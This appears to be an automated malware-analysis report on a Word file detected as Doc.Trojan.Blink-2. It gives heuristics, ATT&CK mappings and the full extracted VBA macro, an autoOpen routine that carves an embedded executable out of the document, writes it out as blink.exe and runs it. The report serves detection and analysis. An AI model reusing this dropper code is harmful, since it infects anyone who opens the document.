MALICIOUS
308
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1105 Ingress Tool Transfer
The sample contains a VBA macro with an autoOpen subroutine that is designed to execute. This macro copies an embedded executable file named 'blink.exe' from within the document to the filesystem and then executes it. The embedded executable is also detected by ClamAV as Doc.Trojan.Blink-2, indicating a known malicious payload.
Heuristics 7
-
ClamAV: Doc.Trojan.Blink-2 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.Blink-2
-
Embedded PE executable critical OLE_EMBEDDED_EXEMZ/PE header found inside document — possible embedded executable
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Potential Shell call in VBA critical OLE_VBA_SHELLPotential Shell call in VBAMatched line in script
CloseFile h Shell "blink.exe", 4 End Sub -
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Sub autoOpen() On Error Resume Next -
Reference to VirtualAlloc API medium SC_STR_VIRTUALALLOCReference to VirtualAlloc API
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 1540 bytes |
SHA-256: 1921d50b92241ba66a514b8f61241fb2a45206e1f0fa5febe2908246b6e00e5c |
|||
|
Detection
ClamAV:
Doc.Trojan.Blink-2
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "Blink" Private Declare Function OpenFile Lib "kernel32" Alias "_lopen" (ByVal s As String, ByVal mode As Long) As Long Private Declare Function CreateFile Lib "kernel32" Alias "_lcreat" (ByVal s As String, ByVal attr As Long) As Long Private Declare Function GlobalAlloc Lib "kernel32" (ByVal fl As Long, ByVal n As Long) As Long Private Declare Sub CopyFileA Lib "kernel32" (ByVal src As String, ByVal dst As String, ByVal mode As Long) Private Declare Sub SeekFile Lib "kernel32" Alias "_llseek" (ByVal h As Long, ByVal ofs As Long, ByVal fw As Long) Private Declare Sub ReadFile Lib "kernel32" Alias "_lread" (ByVal h As Long, ByVal ptr As Long, ByVal n As Long) Private Declare Sub WriteFile Lib "kernel32" Alias "_lwrite" (ByVal h As Long, ByVal ptr As Long, ByVal n As Long) Private Declare Sub CloseFile Lib "kernel32" Alias "_lclose" (ByVal h As Long) Sub autoOpen() On Error Resume Next 'BLiNK by ULTRAS[MATRiX] Dim doc As String, exe As String Dim h As Long, p As Long doc = "blink.doc" exe = "blink.exe" CopyFileA ActiveDocument.FullName, doc, 0 p = GlobalAlloc(0, 8192) h = OpenFile(doc, 0) SeekFile h, 29696, 0 ReadFile h, p, 8192 CloseFile h h = CreateFile(exe, 0) WriteFile h, p, 8192 CloseFile h Shell "blink.exe", 4 End Sub |
|||
embedded_office_00007400.exe |
embedded-pe | Office MZ+PE at offset 0x7400 | 8192 bytes |
SHA-256: dcd63bfe778fb90f62aff754f3361f1ae08ad382808a59c47a3adf6897830cf5 |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.